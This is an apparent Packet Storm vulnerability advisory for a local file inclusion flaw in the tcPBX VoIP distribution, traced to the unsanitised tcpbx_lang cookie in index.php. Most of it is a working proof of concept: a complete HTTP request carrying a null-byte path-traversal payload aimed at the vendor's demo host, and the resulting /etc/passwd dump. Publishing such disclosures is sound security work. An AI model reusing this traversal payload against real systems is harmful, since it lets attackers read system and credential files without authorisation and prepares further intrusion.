tcPBX suffers from a remote file disclosure vulnerability.
bb4bbff19dfe898efeea66662739f83a07b1fec11a4de51e1520dbbc6f187bf4Vulnerable hardware : tcpbx voip distro
Vendor : www.tcpbx.org
Author : Ahmed sultan (@0x4148)
Email : 0x4148@gmail.com
Summary : According to the vendor's site ,
tcPbX is a complete and functional VoIP phone system based on Asterisk open
source software and CentOS operating system.
The simplified installation and the new administration portal allow you to
have a full featured phone system in less than an hour without specific
skills on linux or asterisk
Vulnerable file : /var/www/html/tcpbx/index.php
The software suffer from LFI flaw because of the tcpbx_lang parameter isn't
sanitized before being proceeded in the file
Request
GET /tcpbx/ HTTP/1.1
Host: demo.tcpbx.org
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: tcpbx_lang=../../../../../../../../../../etc/passwd%00;
PHPSESSID=cupsei1iqmv2bqa81pkcvg4jg1
Connection: close
Cache-Control: max-age=0
-----------------------------------
Response
HTTP/1.1 200 OK
Date: Fri, 19 Aug 2016 15:45:30 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23874
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed